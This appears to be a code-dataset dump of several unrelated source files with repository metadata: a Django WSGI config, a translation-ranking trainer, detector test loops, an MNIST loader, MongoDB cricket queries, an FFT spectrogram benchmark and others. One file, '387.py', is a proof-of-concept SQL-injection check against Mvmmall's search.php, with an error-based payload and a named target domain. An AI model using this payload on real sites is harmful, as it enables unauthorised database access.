#calss header
class _PLOUGH():
def __init__(self,):
self.name = "PLOUGH"
self.definitions = [u'a large farming tool with blades that digs the soil in fields so that seeds can be planted', u'If land is under the plough, crops are grown on it: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"[email protected]"
] | |
3a7f9382b72dd52806311d2bed487a411dca70e4 | 1c4309daf6e53cc3cdf7dc9074cbb94d2dc7c15b | /digital/trend/trend/wsgi.py | a9ca274a90cc165c19e43f4a454b1df36ea19a5c | [] | no_license | OBAMARIE13/digital-trend | be55827e398dffcead4345eed8af40abaa059077 | 07113e987163050cb94b022e85428bdfd673dd25 | refs/heads/main | 2023-05-11T11:26:50.344084 | 2021-05-31T17:04:22 | 2021-05-31T17:04:22 | 372,575,744 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | """
WSGI config for trend project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'trend.settings')
application = get_wsgi_application()
| [
"[email protected]"
] | |
0d45b58ea30bf2d1410cade9e95116631c1f3d7b | 79dc13c4b3a6d7cf2ab53312e95493d57d99f8a6 | /hw4/all_copied_features2 | 76911544a27ec4eccfcaafb70bd8a42d29505018 | [] | no_license | vrobison/sp2015.11-731 | 311198e35f069f5f22dc7ee3abf2e98749215be8 | 972f3b5292c41f81b12b0c2364a2936b78c55390 | refs/heads/master | 2021-01-17T23:55:05.067828 | 2015-05-08T15:03:34 | 2015-05-08T15:03:34 | 29,400,593 | 0 | 0 | null | 2015-01-17T18:14:08 | 2015-01-17T18:14:07 | Python | UTF-8 | Python | false | false | 11,771 | #!/usr/bin/env python
import sys
import argparse
import numpy as np
from scipy.sparse import csr_matrix
import random
from collections import defaultdict
from utils import read_ttable
def dot(f, w):
s = 0.0
for k in f.keys():
s += f[k] * w[wvocabulary[k]]
return s
def updatew(wi,xcy,ynot):
#x,prev,next,y,origfeats
a = 0.0001
dLdw = {}
dLdw[xcy[1]] = -1.0
dLdw[xcy[2]] = -1.0
dLdw[ynot[1]] = 1.0
dLdw[ynot[2]] = 1.0
for f in ynot[4].keys():
dLdw[f] = ynot[4][f] - xcy[4][f]
for i in range(5,len(xcy)):
if xcy[i] != ynot[i]:
dLdw[xcy[i]] = -1.0
dLdw[ynot[i]] = 1.0
adLdw = {}
for i in dLdw.keys():
adLdw[i] = a*dLdw[i]
wiplus = wi
for k in adLdw.keys():
wiplus[wvocabulary[k]] = (wi[wvocabulary[k]] - adLdw[k])
return wiplus
def L(xcy,ynot,g):
#xcy: (x,prev,next,y*,feats)
#ynot: (x,prev,next,y-,feats2)
#0.000005 0.387528 #1->0.390202
#indexes in w of form f1,f2,f3,f4,x_y_cleft, x_y_cright
#for ynot in fxcynot: #for each wrong y
diff = {}
#prev& next
diff[xcy[1]] = 1.0
diff[xcy[2]] = 1.0
diff[ynot[1]] = -1.0
diff[ynot[2]] = -1.0
for f in ynot[4].keys(): #orig float features
diff[f] = xcy[4][f] - ynot[4][f]
for i in range(5,len(xcy)):
if xcy[i] != ynot[i]:
diff[xcy[i]] = 1.0
diff[ynot[i]] = -1.0
m = max(0, (g-dot(diff, weights)))
return m
parser = argparse.ArgumentParser()
parser.add_argument('--input', '-i', default='data/dev+test.input')
parser.add_argument('--train','-tr',default='data/train.input')
parser.add_argument('--refs', '-r',default='data/train.refs')
parser.add_argument('--ttable', '-t', default='data/ttable')
parser.add_argument('--parses','-p',default='data/train.parses')
parser.add_argument('--devparses','-dp',default='data/dev+test.parses')
args = parser.parse_args()
#line.decode('utf-8').strip()
par= open(args.parses).read().split('\n\n')
parses =[]
for p in par: parses.append(p.split('\n'))
for p in range(len(parses)):
for l in range(len(parses[p])):
parses[p][l] = parses[p][l].decode('utf-8').strip()
dpar= open(args.devparses).read().split('\n\n')
dparses =[]
for dp in dpar: dparses.append(dp.split('\n'))
for dp in range(len(dparses)):
for dl in range(len(dparses[dp])):
dparses[dp][dl] = dparses[dp][dl].decode('utf-8').strip()
translation_table = read_ttable(args.ttable)
startweights = {'log_prob_tgs': 0.0,'log_prob_sgt': 0.0,'log_lex_prob_tgs':0.0,'log_lex_prob_sgt':0.0} #simple weight vector (1 0 0 0)
windptr = [0]
windices = []
wdata = []
wvocabulary = {}
ALLcsr = []
for f in startweights.keys():
windex = wvocabulary.setdefault(f,len(wvocabulary))
windices.append(windex)
wdata.append(startweights[f])
ix = []
indptr = [0]
indices = []
data = []
vocabulary = {}
for l, line in enumerate(open(args.train)):
left_context, phrase, right_context = [part.strip() for part in line.decode('utf-8').strip().split('|||')]
candidates = [(target,features) for target, features in translation_table[phrase].iteritems()]
xcynot = []
parse = parses[l]
lineOfPhrase = parse[len(left_context.split())]
dep = lineOfPhrase.split('\t')[-1]
parentIdx = int(lineOfPhrase.split('\t')[-2])-1
parentword = ''
if parentIdx == -1: parentword = 'ROOT'
else: parentword = parse[parentIdx].split('\t')[1]
POS = lineOfPhrase.split('\t')[3]
parentPOS = parse[parentIdx].split('\t')[3]
left_context = ('<s> '+left_context).strip()
right_context = (right_context + ' <\s>').strip()
left_word = left_context.split()[-1]
right_word = right_context.split()[0]
l2 = ''
if len(left_context.split()) > 1:
l2 = left_context.split()[-2]
n2 = ''
if len(right_context.split()) > 1:
n2 = right_context.split()[1]
for y,feat in candidates:
prev = 'src:'+phrase+'_tgt:'+y+'_prev:'+left_word
next = 'src:'+phrase+'_tgt:'+y+'_next:'+right_word
parent = 'src:'+phrase+'_tgt:'+y+'_parent:'+parentword
deprole = 'src:'+phrase+'_tgt:'+y+'_dep:'+dep
suffix = y
if len(y) > 2: suffix = y[-2:]
POScase = 'POS:'+POS+'_case:'+suffix
DEPcase = 'DEP:'+dep+'_case:'+suffix
SUBJcase = 'SUBJ:'+parentword+'_case:'+suffix
Pcase = 'PREV:'+left_word+'_case:'+suffix
Ncase = 'NEXT:'+right_word+'_case:'+suffix
parPOS = 'parentPOS'+parentPOS+'_case'+y+suffix
prev2 = 'src:'+phrase+'_tgt:'+y+'_prev:'+l2+'_'+left_word
next2 = 'src:'+phrase+'_tgt:'+y+'_next:'+right_word+'_'+n2
basic = 'src:'+phrase+'_tgt:'+y
parCase = 'parent'+parentword+'_case:'+suffix
windex = wvocabulary.setdefault(prev, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(next, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(parent, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(deprole, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(POScase, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(DEPcase, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(SUBJcase, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(Pcase, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(Ncase, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(parPOS, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(prev2, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(next2, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(basic, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windex = wvocabulary.setdefault(parCase, len(wvocabulary))
windices.append(windex)
wdata.append(0.0)
windptr.append(len(windices))
#feats = csr_matrix((data,indices,indptr),dtype=float).toarray()
#print wvocabulary
#print feats
weights = csr_matrix((wdata,windices,windptr),dtype=float).toarray()
weights = weights[0]
vocabset = set()
for v in wvocabulary.keys():
vocabset.add(v)
sys.stderr.write('finished weight setup')
#print weights
#sys.stderr.write(str(len(feats[0]))+' '+str(len(weights[0]))+' '+str(len(ix)))
reffile = open(args.refs).readlines()
refs =[]
for r in reffile: refs.append(r.strip())
for iteration in range(3): #5->0.390308 #4-->0.39029
sys.stderr.write('starting iteration'+str(iteration+1)+'\n')
data = []
for l, line in enumerate(open(args.train)):
data.append((line + ' ||| '+refs[l]))
#random.shuffle(data)
for l, line in enumerate(data):
left_context, phrase, right_context,ref = [part.strip() for part in line.decode('utf-8').strip().split('|||')]
candidates = [(target,features) for target, features in sorted(translation_table[phrase].iteritems(), key=lambda (t, f): dot(f, weights), reverse=True)]
xcynot = []
parse = parses[l]
lineOfPhrase = parse[len(left_context.split())]
dep = lineOfPhrase.split('\t')[-1]
parentIdx = int(lineOfPhrase.split('\t')[-2])-1
parentword = ''
if parentIdx == -1: parentword = 'ROOT'
else: parentword = parse[parentIdx].split('\t')[1]
POS = lineOfPhrase.split('\t')[3]
parentPOS = parse[parentIdx].split('\t')[3]
n = 0
left_context = ('<s> '+left_context).strip()
right_context = (right_context + ' <\s>').strip()
left_word = left_context.split()[-1]
right_word = right_context.split()[0]
l2 = ''
if len(left_context.split()) > 1:
l2 = left_context.split()[-2]
n2 = ''
if len(right_context.split()) > 1:
n2 = right_context.split()[1]
for (y,origfeat) in candidates:
prev = 'src:'+phrase+'_tgt:'+y+'_prev:'+left_word
next = 'src:'+phrase+'_tgt:'+y+'_next:'+right_word
parent = 'src:'+phrase+'_tgt:'+y+'_parent:'+parentword
deprole = 'src:'+phrase+'_tgt:'+y+'_dep:'+dep
suffix = y
if len(y) > 2: suffix = y[-2:]
POScase = 'POS:'+POS+'_case:'+suffix
DEPCase = 'DEP:'+dep+'_case:'+suffix
SUBJcase = 'SUBJ:'+parentword+'_case:'+suffix
Pcase = 'PREV:'+left_word+'_case:'+suffix
Ncase = 'NEXT:'+right_word+'_case:'+suffix
parPOS = 'parentPOS'+parentPOS+'_case'+y+suffix
prev2 = 'src:'+phrase+'_tgt:'+y+'_prev:'+l2+'_'+left_word
next2 = 'src:'+phrase+'_tgt:'+y+'_next:'+right_word+'_'+n2
basic = 'src:'+phrase+'_tgt:'+y
parCase = 'parent'+parentword+'_case:'+suffix
if y == ref:
xcy = (phrase, prev, next, y, origfeat, parent, deprole, POScase, DEPcase, SUBJcase, Pcase, Ncase, parPOS, prev2 ,next2, basic, parCase)
# xcy = (phrase,prev,next,y,origfeat,0,0,0,0,0,0,0)
else:
xcynot.append((phrase, prev, next, y, origfeat, parent, deprole, POScase, DEPcase, SUBJcase, Pcase, Ncase, parPOS, prev2, next2, basic, parCase))
#xcynot.append((phrase,prev,next,y,origfeat,0,0,0,0,0,0,0))
#incorrect
for ynot in xcynot:
if L(xcy,ynot,0.25) != 0: #float is gamma
weights = updatew(weights,xcy,ynot)
sys.stderr.write('finished training')
for l,line in enumerate(open(args.input)):
left_context, phrase, right_context = [part.strip() for part in line.decode('utf-8').strip().split('|||')]
candidates = [(target,features) for target, features in sorted(translation_table[phrase].iteritems(), key=lambda (t, f): dot(f, weights), reverse=True)]
c2 = []
parse = dparses[l]
lineOfPhrase = parse[len(left_context.split())]
dep = lineOfPhrase.split('\t')[-1]
parentIdx = int(lineOfPhrase.split('\t')[-2])-1
parentword = ''
if parentIdx == -1: parentword = 'ROOT'
else: parentword = parse[parentIdx].split('\t')[1]
POS = lineOfPhrase.split('\t')[3]
parentPOS = parse[parentIdx].split('\t')[3]
left_context = ('<s> '+left_context).strip()
right_context = (right_context + ' <\s>').strip()
left_word = left_context.split()[-1]
right_word = right_context.split()[0]
l2 = ''
if len(left_context.split()) > 1:
l2 = left_context.split()[-2]
n2 = ''
if len(right_context.split()) > 1:
n2 = right_context.split()[1]
for (y,feat) in candidates:
prev = 'src:'+phrase+'_tgt:'+y+'_prev:'+left_context
next = 'src:'+phrase+'_tgt:'+y+'_next:'+right_context
parent = 'src:'+phrase+'_tgt:'+y+'_parent:'+parentword
deprole = 'src:'+phrase+'_tgt:'+y+'_dep:'+dep
suffix = y
if len(y) > 2: suffix = y[-2:]
POScase = 'POS:'+POS+'_case:'+suffix
DEPcase = 'DEP:'+dep+'_case:'+suffix
SUBJcase = 'SUBJ:'+parentword+'_case:'+suffix
Pcase = 'PREV:'+left_context+'_case:'+suffix
Ncase = 'NEXT:'+right_context+'_case:'+suffix
parPOS = 'parentPOS'+parentPOS+'_case'+y+suffix
prev2 = 'src:'+phrase+'_tgt:'+y+'_prev:'+l2+'_'+left_word
next2 = 'src:'+phrase+'_tgt:'+y+'_next:'+right_word+'_'+n2
basic = 'src:'+phrase+'_tgt:'+y
parCase = 'parent'+parentword+'_case:'+suffix
if prev in vocabset: feat[prev] = 1.0
if next in vocabset: feat[next] = 1.0
if parent in vocabset: feat[parent] = 1.0
if deprole in vocabset: feat[deprole] = 1.0
if POScase in vocabset: feat[POScase] = 1.0
if DEPcase in vocabset: feat[DEPcase] = 1.0
if SUBJcase in vocabset: feat[SUBJcase] = 1.0
if Pcase in vocabset: feat[Pcase] = 1.0
if Ncase in vocabset: feat[Ncase] = 1.0
if parPOS in vocabset: feat[parPOS] = 1.0
if prev2 in vocabset: feat[prev2] = 1.0
if next2 in vocabset: feat[next2] = 1.0
if basic in vocabset: feat[basic] = 1.0
if parCase in vocabset: feat[parCase] = 1.0
#sys.stderr.write('using dep feature...')
#sys.stderr.write(str(dot(feat,weights))+'\t')
c2.append((y,dot(feat,weights)))
c3 = sorted(c2, key=lambda x: x[1], reverse=True)
cfinal = []
for i in range(len(c3)):
cfinal.append(c3[i][0])
print ' ||| '.join(cfinal).encode('utf-8')
sys.stderr.write('.')
#sys.stderr.write(' ||| '.join(candidates).encode('utf-8'))
| [
"[email protected]"
] | ||
7a585f12998db78082bbf1742eaaebe96554b0df | 54a6a6c07276cdb6436d833243e3a15d6742cfe5 | /test/test_loop_snap_stop.py | 1cee41b933b33232cc7c1c6a13c1f49623651a8b | [] | no_license | soleil-ica/Lima-camera-imxpad | 6e17028dbe18a382c4e084426230da04bba127b0 | cf1767b9058f43cc44f807c65c4b5e8876b27d60 | refs/heads/master | 2023-08-29T09:48:43.274381 | 2023-02-15T18:00:28 | 2023-02-17T14:58:09 | 61,614,724 | 0 | 4 | null | 2022-05-23T16:05:21 | 2016-06-21T08:05:19 | C++ | UTF-8 | Python | false | false | 4,351 | py | #!/usr/bin/env python
#########################################################
#Arafat NOUREDDINE
#2014/11/19
#Purpose : Test LimaDetector state
#########################################################
import os
import sys
import PyTango
import time
import datetime
proxy = ''
#------------------------------------------------------------------------------
# build exception
#------------------------------------------------------------------------------
class BuildError(Exception):
pass
#------------------------------------------------------------------------------
# Colors
#------------------------------------------------------------------------------
class bcolors:
PINK = '\033[95m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
ENDC = '\033[0m'
UNDERLINE = '\033[4m'
def disable(self):
self.PINK = ''
self.BLUE = ''
self.GREEN = ''
self.YELLOW = ''
self.FAIL = ''
self.ENDC = ''
self.UNDERLINE = ''
#------------------------------------------------------------------------------
def snap(proxy, integration, latency, stop_after):
print '\nSnap() \n------------------'
#Configure the device
#Display time when state is STANDBY (just before load())
timeBegin = datetime.datetime.now()
print timeBegin.isoformat(), ' - ', proxy.state()
proxy.exposureTime = integration
proxy.latencyTime = latency
proxy.Snap()
#Display time when state is RUNNING (just after timeSnap())
timeSnap = datetime.datetime.now()
print timeSnap.isoformat(), ' - ', proxy.state()
time.sleep(stop_after/1000)
#force stop after integration time
proxy.Stop()
#Display time when state is STANDBY (just after acquisition is finish)
timeEnd = datetime.datetime.now()
print '\n', timeEnd.isoformat(), ' - ', proxy.state()
print '\nDuration = ', ((timeEnd-timeSnap).total_seconds()*1000),'(ms)'
time.sleep(latency)
return
#return proxy.image
#------------------------------------------------------------------------------
# Usage
#------------------------------------------------------------------------------
def usage():
print "Usage: [python] test_loop_snap_stop.py <my/device/proxy> <integration time in ms> <latency in ms> <stop_after in ms> <nb_loops>"
sys.exit(1)
#------------------------------------------------------------------------------
# run
#------------------------------------------------------------------------------
def run(proxy_name = 'test/lima/imxpad.1', integration = 5000, latency = 0, stop_after = 2000 , nb_loops = 100000):
# print arguments
print '\nProgram inputs :\n--------------'
print 'proxy_name\t = ', proxy_name
print 'integration\t = ', integration
print 'latency\t = ', latency
print 'stop_after\t = ', stop_after
print 'nb_loops\t = ', nb_loops
proxy = PyTango.DeviceProxy(proxy_name)
#Configure the device
print '\nConfigure Device attributes :\n--------------'
proxy.Stop()
nb_loops = int(nb_loops)
integration = float(integration)
latency = float(latency)
stop_after = float(stop_after)
alias = '1'
print '\n'
try:
current_loop = 0
while(current_loop<nb_loops):
print '\n========================================================'
print '\t' + bcolors.PINK + 'Loop : ', current_loop, bcolors.ENDC,
print '\n========================================================'
snap(proxy, integration, latency, stop_after)
current_loop=current_loop+1
state = proxy.state()
if (state!=PyTango.DevState.STANDBY):
# raise Exception('FAIL : Acquisition is end with state (%s)' %(state))
print bcolors.RED + 'Device is in FAULT !',bcolors.ENDC,
print '\noutput :\n--------------'
print '\nProgram outputs :\n--------------'
except Exception as err:
sys.stderr.write('--------------\nERROR :\n--------------\n%s\n' %err)
#------------------------------------------------------------------------------
# Main Entry point
#------------------------------------------------------------------------------
if __name__ == "__main__":
# if len(sys.argv) < 4:
# usage()
print run(*sys.argv[1:])
| [
"[email protected]"
] | |
a3a5d94d9d641fb85d1031115f2381f650289f28 | 46cb587e5473e6bb47878ebbaaf8fa76fcd97f89 | /09-NeuralNetwork/20181028/mnist_loader.py | 3fa24e108f8d4a4f8d6582b88155ce0ab44d70af | [] | no_license | AaronFlower/Jupyter | d342a3decb050985b4f4dcad4a0c1fd05a771f76 | 3fd252c10399e9057ba9a23e75651875ab6d89f2 | refs/heads/master | 2023-08-09T07:27:27.432826 | 2023-07-12T08:09:12 | 2023-07-12T08:09:12 | 84,337,325 | 1 | 1 | null | 2017-03-22T16:11:52 | 2017-03-08T15:42:13 | Jupyter Notebook | UTF-8 | Python | false | false | 1,089 | py | # -*- coding: utf-8 -*-
import gzip
import pickle
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
def load_data():
f = gzip.open('../mnist.pkl.gz', 'rb')
train, val, test = pickle.load(f, encoding='bytes')
f.close()
return train, val, test
def load_data_wrapper():
train, val, test = load_data()
train_X = [x.reshape(-1, 1) for x in train[0]]
train_y = [vectorize(y) for y in train[1]]
val_X = [x.reshape(-1, 1) for x in val[0]]
test_X = [x.reshape(-1, 1) for x in test[0]]
return (
list(zip(train_X, train_y)),
list(zip(val_X, val[1])),
list(zip(test_X, test[1]))
)
def vectorize(i):
y = np.zeros((10, 1))
y[i] = 1
return y
def plot_images6(data):
ilist = np.random.permutation(len(data))
fig = plt.figure()
for i in range(1, 7):
X, _ = data[ilist[i]]
image = X.reshape(28, 28)
ax = fig.add_subplot(1, 6, i)
ax.matshow(image, cmap=matplotlib.cm.binary)
plt.xticks(np.array([]))
plt.yticks(np.array([]))
plt.show()
| [
"[email protected]"
] | |
0c448d5d9533485b666d5f11510eb4bdf0e13294 | 9fa07ba96a5330712bb1f1d0874375e6f4923ce7 | /wait/www/387.py | 3d6ab8263419dea2fd32e7413af8f4570a1f4842 | [] | no_license | Ajatars/Ajatar | cf4460d881b18095ce968c883e68500d44f90570 | 943b71285e6b74ae38861aa305d26b0a9bef4050 | refs/heads/master | 2020-06-02T02:14:05.989075 | 2019-06-10T02:48:10 | 2019-06-10T02:48:10 | 191,002,958 | 11 | 2 | null | null | null | null | UTF-8 | Python | false | false | 981 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
POC Name : Mvmmall search.php SQL Injection
Reference : http://www.wooyun.org/bugs/wooyun-2011-01732
Author : NoName
"""
import re
from urllib.parse import urlparse
def assign(service, arg):
if service == "www":
r = urlparse(arg)
return True, '%s://%s/' % (r.scheme, r.netloc)
def audit(arg):
payload = "search.php?tag_ids[goods_id]=uid))%20and(select%201%20from(select%20count(*),concat((select%20(select%20md5(12345))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23"
code, head, res, errcode, _ = curl.curl(arg + payload)
if code == 200:
m = re.search("827ccb0eea8a706c4c34a16891f84e7b1",res)
if m:
security_hole('Mvmmall search.php SQL Injection exists.')
if __name__ == '__main__':
from dummy import *
audit(assign('www', 'http://dajiamai.com/')[1]) | [
"[email protected]"
] | |
8ffe39ec8cedaeb1bdc48e7cdab9d9db8a9f34ba | 30013757093b79e83211fae3f6e2929d402c49e2 | /tpred/mine_twitter_by_followers.py | 13af02cd5b3d2b4a132a1d510a3682536fdebf06 | [] | no_license | schetudiante/tpred | 01031252046b566714878c3af7d870b4cec1b1e7 | 773d70d81d4e1478d641bd5f5f7ee3f4b6250bd8 | refs/heads/master | 2021-05-30T19:56:04.196543 | 2015-12-23T23:59:36 | 2015-12-23T23:59:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 189 | py | import t
import tweet_mine
res = t.api.friends.ids(screen_name='amirpc')['ids']
ids = [str(twid) for twid in res]
it = t.stream.statuses.filter(follow=",".join(ids))
tweet_mine.mine(it)
| [
"[email protected]"
] | |
a0fde5ce97072b01e205d1e9ff8227da865e77ae | 44d277aef0a9b2a8a4d2b8bd20e6402fab13f9f4 | /Fantasy CricketTeam Prediction/WebApp/dbms/new/database.py | 57d980b2785e184c42ad0026d48e920520406e35 | [] | no_license | pikachua7/Fantasy-Cricket-Team-Prediction | d6eeb8c8a9bff0a8d480e9f6b2b877075f78c6ae | d991264a4d3f8f33e106e5a43b55f853018af51d | refs/heads/master | 2023-01-05T14:12:56.440338 | 2020-11-07T17:38:28 | 2020-11-07T17:38:28 | 310,897,232 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,841 | py | import pymongo
# from new.views import team
# teams=team
myc=pymongo.MongoClient('mongodb://localhost:27017/')
mydb=myc['ipl']
class batsman_gen:
batsman=mydb['batsman']
def generate(self,teams):
array=[]
if len(teams)>=2:
query1={'Team':teams[0]}
query2={'Team':teams[1]}
selected=self.batsman.find({'$or':[query1,query2]},{'_id':0,'Player':1}).sort('Player')
for x in selected:
array.append(x.get('Player'))
return array
else:
array.append('0000')
return array
def mygenerate(self,teams):
array=[]
if len(teams)>=2:
query1={'Team':teams[0]}
query2={'Team':teams[1]}
selected=self.batsman.find({'$or':[query1,query2]},{'_id':0,'Player':1,'Batting_Parameter':1,'Team':1}).sort('Batting_Parameter',-1)
for x in selected:
array.append(x)
return array
else:
array.append('0000')
return array
class bowler_gen:
bowler=mydb['bowler']
def generate(self,teams):
array=[]
if len(teams)>=2:
query1={'Team':teams[0]}
query2={'Team':teams[1]}
selected=self.bowler.find({'$or':[query1,query2]},{'_id':0,'Player':1}).sort('Player')
for x in selected:
array.append(x.get('Player'))
return array
else:
array.append('0000')
return array
def mygenerate(self,teams):
array=[]
if len(teams)>=2:
query1={'Team':teams[0]}
query2={'Team':teams[1]}
selected=self.bowler.find({'$or':[query1,query2]},{'_id':0,'Player':1,'Batting_Parameter':1,'Team':1}).sort('Bowling_Parameter')
for x in selected:
array.append(x)
return array
else:
array.append('0000')
return array
class allrounder_gen:
allrounder=mydb['allrounder']
def generate(self,teams):
array=[]
if len(teams)>=2:
query1={'Team':teams[0]}
query2={'Team':teams[1]}
selected=self.allrounder.find({'$or':[query1,query2]},{'_id':0,'Player':1}).sort('Player')
for x in selected:
array.append(x.get('Player'))
return array
else:
array.append('0000')
return array
def mygenerate(self,teams):
array=[]
if len(teams)>=2:
query1={'Team':teams[0]}
query2={'Team':teams[1]}
selected=self.allrounder.find({'$or':[query1,query2]},{'_id':0,'Player':1,'Batting_Parameter':1,'Team':1}).sort('Allrounder_Parameter',-1)
for x in selected:
array.append(x)
return array
else:
array.append('0000')
return array
class keeper_gen:
keeper=mydb['keeper']
def generate(self,teams):
array=[]
if len(teams)>=2:
query1={'Team':teams[0]}
query2={'Team':teams[1]}
selected=self.keeper.find({'$or':[query1,query2]},{'_id':0,'Player':1,'Batting_Parameter':1,'Team':1}).sort('Player')
for x in selected:
array.append(x['Player'])
return array
else:
array.append('0000')
return array
def mygenerate(self,teams):
array=[]
if len(teams)>=2:
query1={'Team':teams[0]}
query2={'Team':teams[1]}
selected=self.keeper.find({'$or':[query1,query2]},{'_id':0,'Player':1,'Batting_Parameter':1,'Team':1}).sort('Batting_Parameter',-1)
for x in selected:
array.append(x)
return array
else:
array.append('0000')
return array
| [
"[email protected]"
] | |
4bb8afa90a9835e931209b939aa2803521958601 | 2ee49dc0b16ddfd61bf4b2453edc7f733101a7fd | /bench_pyfftw_thread_4.py | d57613b2979e1a1f6f798571a1c6955caf1df2a8 | [
"MIT"
] | permissive | zhouxzh/Jetson_nano_stft_benchmark | 1e004f7fc53ff2ba1cfba60e9e00a559bd49e298 | ffa97984f95b9862ac2a10b8459bb7ef241c6c72 | refs/heads/master | 2020-05-19T02:25:37.344384 | 2019-05-03T16:04:06 | 2019-05-03T16:04:06 | 184,780,356 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,541 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Computes the spectrogram of a test signal using numpy and fftw.
Author: Jan Schlüter
"""
import sys
import os
import timeit
import numpy as np
from pyfftw.builders import rfft as rfft_builder
from testfile import make_test_signal
INPUT_AS_FLOAT = False
def spectrogram(samples, sample_rate=22050, frame_len=1024, fps=70, batch=50):
"""
Computes a magnitude spectrogram for a given vector of samples at a given
sample rate (in Hz), frame length (in samples) and frame rate (in Hz).
Allows to transform multiple frames at once for improved performance (with
a default value of 50, more is not always better). Returns a numpy array.
"""
if len(samples) < frame_len:
return np.empty((0, frame_len // 2 + 1), dtype=samples.dtype)
win = np.hanning(frame_len).astype(samples.dtype)
hopsize = sample_rate // fps
num_frames = max(0, (len(samples) - frame_len) // hopsize + 1)
batch = min(batch, num_frames)
if batch <= 1 or not samples.flags.c_contiguous:
rfft = rfft_builder(samples[:frame_len], n=frame_len, threads=4)
spect = np.vstack(np.abs(rfft(samples[pos:pos + frame_len] * win))
for pos in range(0, len(samples) - frame_len + 1,
int(hopsize)))
else:
rfft = rfft_builder(np.empty((batch, frame_len), samples.dtype),
n=frame_len, threads=4)
frames = np.lib.stride_tricks.as_strided(
samples, shape=(num_frames, frame_len),
strides=(samples.strides[0] * hopsize, samples.strides[0]))
spect = [np.abs(rfft(frames[pos:pos + batch] * win))
for pos in range(0, num_frames - batch + 1, batch)]
if num_frames % batch:
spect.append(spectrogram(
samples[(num_frames // batch * batch) * hopsize:],
sample_rate, frame_len, fps, batch=1))
spect = np.vstack(spect)
return spect
def main():
# load input
global x
x = make_test_signal()
if INPUT_AS_FLOAT:
x = x.astype(np.float32)
# benchmark
times = timeit.repeat(
setup='from __main__ import x, spectrogram, np',
stmt='spectrogram(np.asarray(x, np.float32))',
repeat=5, number=32)
print("Took %.3fs." % (min(times) / 32))
# save result
#np.save(sys.argv[0][:-2] + 'npy', spectrogram(x.astype(np.float32)))
if __name__=="__main__":
main()
| [
"[email protected]"
] | |
5ae031aeb99d729fe90dc2b53d1bb9e39586fc7e | ed273db8304adf27b9117817b7d4376ffef6f375 | /Carta.py | 79c61ecaa0c38454a082b6a89ad021f634094efb | [] | no_license | mamerida/python-poo-curse | 282a4cbe6704d18f7f59799354135bc1bc6d7ce5 | b99d1736ac77eed3dbc0371ddbefcd148e85f4db | refs/heads/master | 2023-07-13T05:35:40.103830 | 2021-08-23T15:46:50 | 2021-08-23T15:46:50 | 367,674,569 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 539 | py | class Carta:
def __init__(self, numero, palo ):
self.palo = palo
self.numero = numero
def convertir_numero_a_letra(self):
valor=""
if (self.numero == 11):
valor ="J"
elif (self.numero == 12):
valor ="Q"
elif (self.numero == 13):
valor ="K"
elif (self.numero == 1):
valor = "As"
else:
valor = str(self.numero)
return valor
def imprimir(self):
numero = self.convertir_numero_a_letra()
print(numero ," de ",self.palo)
def obtener_numero(self):
return 10 if self.numero > 10 else self.numero
| [
"[email protected]"
] | |
619dff3fc4f5f34f2ea4f843e80b2f4d472b30d0 | b6bcfd935f7876fc65416e7340fda1c9b0516fd7 | /pyscf/tdscf/test/test_tduks.py | 091c6b43834c92a378e73acb5b9bd073aa22e37b | [
"Apache-2.0"
] | permissive | lzypotato/pyscf | 62f849b9a3ec8480c3da63a5822ea780608796b2 | 94c21e2e9745800c7efc7256de0d628fc60afc36 | refs/heads/master | 2020-09-06T22:45:04.191935 | 2019-06-18T06:04:48 | 2019-06-18T06:04:48 | 220,578,540 | 1 | 0 | Apache-2.0 | 2019-11-09T02:13:16 | 2019-11-09T02:13:15 | null | UTF-8 | Python | false | false | 13,906 | py | #!/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Qiming Sun <[email protected]>
#
import unittest
import numpy
import copy
from pyscf import lib, gto, scf, dft
from pyscf import tdscf
mol = gto.Mole()
mol.verbose = 5
mol.output = '/dev/null'
mol.atom = [
["O" , (0. , 0. , 0.)],
[1 , (0. , -0.757 , 0.587)],
[1 , (0. , 0.757 , 0.587)] ]
